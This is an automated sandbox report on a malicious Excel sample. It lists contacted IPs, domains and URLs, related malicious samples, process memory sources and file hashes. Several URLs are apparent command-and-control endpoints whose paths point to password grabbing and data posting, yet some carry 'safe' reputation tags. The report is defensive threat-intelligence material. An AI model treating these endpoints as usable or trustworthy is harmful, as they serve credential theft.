                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://103.102.220.50:443W60%Avira URL Cloudsafe
                https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k0%Avira URL Cloudsafe
                https://103.102.220.50:443/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/0%Avira URL Cloudsafe
                http://115.241.244.185:4430%Avira URL Cloudsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                http://190.89.3.117:4430%Avira URL Cloudsafe
                http://5.202.120.150:4430%Avira URL Cloudsafe
                http://83.220.115.230:4430%Avira URL Cloudsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//0%Avira URL Cloudsafe
                http://185.119.120.213:4430%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://www.icra.org/vocabulary/.0%URL Reputationsafe
                http://103.102.220.50:443Edge0%Avira URL Cloudsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//0%Avira URL Cloudsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/0%Avira URL Cloudsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%20%Avira URL Cloudsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                http://www.%s.comPA0%URL Reputationsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://103.102.220.50:4430%Avira URL Cloudsafe
                http://103.102.220.50:443X60%Avira URL Cloudsafe
                http://177.84.63.252:4430%Avira URL Cloudsafe
                https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                elb097307-934924932.us-east-1.elb.amazonaws.com
                54.243.154.178
                truefalse
                  high
                  3.52.17.84.cbl.abuseat.org
                  127.0.0.2
                  truefalse
                    high
                    deluciaspizza.com
                    144.208.70.30
                    truefalseunknown
                    3.52.17.84.zen.spamhaus.org
                    unknown
                    unknownfalse
                      high
                      api.ipify.org
                      unknown
                      unknownfalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://api.ipify.org/?format=textfalse
                          high
                          https://103.102.220.50:443/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/false
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpfalse
                            high
                            http://investor.msn.comrundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpfalse
                              high
                              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpfalse
                                high
                                https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/Owermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.comodoca.cwermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.entrust.net/server1.crl0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                  high
                                  http://ocsp.entrust.net03wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://189.195.96.238:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://36.95.27.243:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.diginotar.nl/cps/pkioverheid0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://103.102.220.50:443W6wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/kwermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://115.241.244.185:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpfalse
                                    high
                                    http://190.89.3.117:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://5.202.120.150:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://83.220.115.230:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpfalse
                                      high
                                      http://185.119.120.213:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmpfalse
                                        high
                                        http://103.102.220.50:443Edgewermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://investor.msn.com/rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmpfalse
                                          high
                                          https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.%s.comPAwermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ocsp.entrust.net0Dwermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://secure.comodo.com/CPS0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                            high
                                            http://103.102.220.50:443wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://103.102.220.50:443X6wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://crl.entrust.net/2048ca.crl0wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmpfalse
                                              high
                                              http://177.84.63.252:443wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/inwermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              144.208.70.30
                                              deluciaspizza.comUnited States
                                              22611IMH-WESTUSfalse
                                              117.54.250.246
                                              unknownIndonesia
                                              9340INDONET-AS-APINDOInternetPTIDtrue
                                              188.18.7.133
                                              unknownRussian Federation
                                              12389ROSTELECOM-ASRUtrue
                                              103.102.220.50
                                              unknownAfghanistan
                                              137039ZT-AS-APZohakTechnologyZ-TechAFfalse
                                              54.243.154.178
                                              elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                                              14618AMAZON-AESUSfalse

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:403507
                                              Start date:04.05.2021
                                              Start time:06:48:10
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 45s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:SecuriteInfo.com.Heur.31681.20936 (renamed file extension from 20936 to xls)
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winXLS@14/16@5/5
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 45.5% (good quality ratio 43.9%)
                                              • Quality average: 87.1%
                                              • Quality standard deviation: 25.1%
                                              HCA Information:
                                              • Successful, ratio: 95%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                                              • TCP Packets have been reduced to 100
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:48:48API Interceptor2x Sleep call for process: rundll32.exe modified
                                              06:48:49API Interceptor20x Sleep call for process: wermgr.exe modified
                                              06:49:06API Interceptor407x Sleep call for process: taskeng.exe modified
                                              06:49:18API Interceptor688x Sleep call for process: cmd.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              103.102.220.50Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/net8/960781_W617601.974713FF940D85BB716F33B3F5F332F3/83/
                                              3f3cb269_by_Libranalysis.dllGet hashmaliciousBrowse
                                              • 103.102.220.50:443/net5/841618_W10017134.BF729E39DB3BB4F6314B213655BDE76B/90
                                              WkwXT9W8gU.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob20/971342_W617601.4BBD802EB3B335D16E6B3326D5107BBF/83/
                                              Upload_1177855142_553122147.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob20/783875_W617601.277332E82A5BB324C5D1D33BF7059753/83/
                                              Upload_1536549966_1095377917.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob20/783875_W617601.733FA77F7559815BB3BD59E6EFF3DFD5/83/
                                              SecuriteInfo.com.Heur.7380.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob16/927537_W617601.B6D69D573370CED33FA8C33B771AECFB/83/
                                              6anfy8I0II.exeGet hashmaliciousBrowse
                                              • 103.102.220.50:443/tot39/082561_W10017134.9BA06BBFD3DAE7F7FFAB1FF33B4C8F55/83/
                                              ieO61Pwnmq.exeGet hashmaliciousBrowse
                                              • 103.102.220.50:443/tot36/123716_W10017134.E7F30BC825AB335A45176C4C8D519073/83/
                                              SecuriteInfo.com.Exploit.Siggen3.9634.14689.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob10/651689_W617601.B1FD33B3D4A53D373C8871B9BB21C1B3/83/
                                              SecuriteInfo.com.Exploit.Siggen3.9634.13595.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob10/082561_W617601.DFD22B33BD5DB16C77395998CBBC7D2E/83/
                                              SecuriteInfo.com.Exploit.Siggen3.9634.30073.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob10/128757_W617601.BB09CB3BE52FF3F1D742633B77500F6F/83/
                                              SecuriteInfo.com.Exploit.Siggen3.9634.10615.xlsGet hashmaliciousBrowse
                                              • 103.102.220.50:443/rob10/088753_W617601.3B377D6A1F734386EFABBC853DF37FBA/83/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              elb097307-934924932.us-east-1.elb.amazonaws.com3e98fa2d_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 54.235.83.248
                                              0429_1556521897736.doc_berd.dllGet hashmaliciousBrowse
                                              • 54.225.169.203
                                              e3d5e715_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 54.243.121.36
                                              8f66.xls.exeGet hashmaliciousBrowse
                                              • 54.225.169.203
                                              berd.b.dllGet hashmaliciousBrowse
                                              • 23.21.48.44
                                              0427_5079687843613.docGet hashmaliciousBrowse
                                              • 107.22.233.72
                                              SThy2G7fGR.exeGet hashmaliciousBrowse
                                              • 50.19.216.111
                                              if.ps1Get hashmaliciousBrowse
                                              • 50.19.216.111
                                              jers.dllGet hashmaliciousBrowse
                                              • 54.235.83.248
                                              ac8e3612_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 50.19.252.36
                                              Onetap.com_Cracked_Auth_Bp_UPDATED_23.04.21.exeGet hashmaliciousBrowse
                                              • 54.225.165.85
                                              furmt.f.dllGet hashmaliciousBrowse
                                              • 23.21.252.4
                                              eGXZrIOs3P.exeGet hashmaliciousBrowse
                                              • 54.235.175.90
                                              ff.exeGet hashmaliciousBrowse
                                              • 54.225.222.160
                                              8s7bEDfYhT.exeGet hashmaliciousBrowse
                                              • 54.225.155.255
                                              8c6b2adbcdd8b7f0a0419fd08e5cbd0f7bc52cc702da4.exeGet hashmaliciousBrowse
                                              • 107.22.233.72
                                              S1g5ShTDXD.exeGet hashmaliciousBrowse
                                              • 54.243.121.36
                                              RykzV2Bdm0.exeGet hashmaliciousBrowse
                                              • 107.22.233.72
                                              9fc4c09d4cb89762626fce008d9840abb128c99ec3cd1.exeGet hashmaliciousBrowse
                                              • 54.243.121.36

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              INDONET-AS-APINDOInternetPTID .exeGet hashmaliciousBrowse
                                              • 202.53.254.22
                                              18attachmen.exeGet hashmaliciousBrowse
                                              • 202.53.254.22
                                              ROSTELECOM-ASRUx86_unpackedGet hashmaliciousBrowse
                                              • 85.95.179.148
                                              z3hir.x86Get hashmaliciousBrowse
                                              • 85.174.206.194
                                              IMG001.exeGet hashmaliciousBrowse
                                              • 89.239.143.118
                                              countryyelow.dllGet hashmaliciousBrowse
                                              • 62.213.14.166
                                              7UvT2Rh8OE.exeGet hashmaliciousBrowse
                                              • 92.49.184.90
                                              FB11.exeGet hashmaliciousBrowse
                                              • 91.122.100.13
                                              SecuriteInfo.com.Trojan.Kronos.21.31435.exeGet hashmaliciousBrowse
                                              • 95.156.95.8
                                              QdSdkWP5JW.exeGet hashmaliciousBrowse
                                              • 77.51.33.250
                                              yVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 2.61.72.86
                                              bin.shGet hashmaliciousBrowse
                                              • 5.139.220.125
                                              118.apkGet hashmaliciousBrowse
                                              • 45.80.65.139
                                              fil1Get hashmaliciousBrowse
                                              • 92.100.125.98
                                              iGet hashmaliciousBrowse
                                              • 176.51.203.237
                                              utox.exeGet hashmaliciousBrowse
                                              • 37.21.226.228
                                              fdwv4hWF1M.exeGet hashmaliciousBrowse
                                              • 5.137.127.230
                                              gl5oynamqQvpADI.exeGet hashmaliciousBrowse
                                              • 77.51.146.19
                                              5026877.xls.exeGet hashmaliciousBrowse
                                              • 77.51.146.19
                                              malware1.exeGet hashmaliciousBrowse
                                              • 92.127.224.154
                                              xJbFpiVs1lGet hashmaliciousBrowse
                                              • 95.70.22.124
                                              jPCgEqAjw2RAY68.exeGet hashmaliciousBrowse
                                              • 95.72.66.155
                                              IMH-WESTUSEmail - Payment Report.htmlGet hashmaliciousBrowse
                                              • 23.235.214.102
                                              PO472020.xltGet hashmaliciousBrowse
                                              • 199.250.214.202
                                              PO472020.xltGet hashmaliciousBrowse
                                              • 199.250.214.202
                                              PO472020.xltGet hashmaliciousBrowse
                                              • 199.250.214.202
                                              SecuriteInfo.com.Exploit.Siggen3.16583.277.xlsGet hashmaliciousBrowse
                                              • 199.250.214.202
                                              0BAdCQQVtP.exeGet hashmaliciousBrowse
                                              • 173.231.192.43
                                              document-4077682.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-1643341247.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              proforma.exeGet hashmaliciousBrowse
                                              • 173.231.192.43
                                              document-1977942244.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-972550903.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-972550903.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-852263110.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-2130763274.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              2021-04-01.exeGet hashmaliciousBrowse
                                              • 23.235.221.122
                                              document-669854873.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-1432391719.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-1811269384.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-586537513.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7
                                              document-1080811384.xlsmGet hashmaliciousBrowse
                                              • 104.152.109.7

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              7dcce5b76c8b17472d024758970a406bcatalog-1521295750.xlsmGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              presupuesto.xlsxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              ORDER INQUIRY.docGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              SecuriteInfo.com.Heur.3421.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              diagram-586750002.xlsmGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              e9251e1f_by_Libranalysis.docxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              Specificatiile produsului.xlsxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              be1aca64_by_Libranalysis.docxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              f.xlsmGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                              • 144.208.70.30
                                              8c4a22651d328568ec66382a84fc505f94a5cd81_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Documents_585904356_2104184844.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              db7db588_by_Libranalysis.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              WkwXT9W8gU.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Upload_1177855142_553122147.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Upload_1536549966_1095377917.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Upload_1672782307_1135693836.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Att_432126117_2131008625.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Heur.24881.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Attach_1760138734_477205649.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Attach_1344833645_1944784007.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Attach_1544259786_1247066717.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              Sign-1870635479_637332644.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.14349.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246
                                              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                              • 117.54.250.246

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58596
                                              Entropy (8bit):7.995478615012125
                                              Encrypted:true
                                              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                              MD5:61A03D15CF62612F50B74867090DBE79
                                              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                              Malicious:false
                                              Reputation:high, very likely benign file
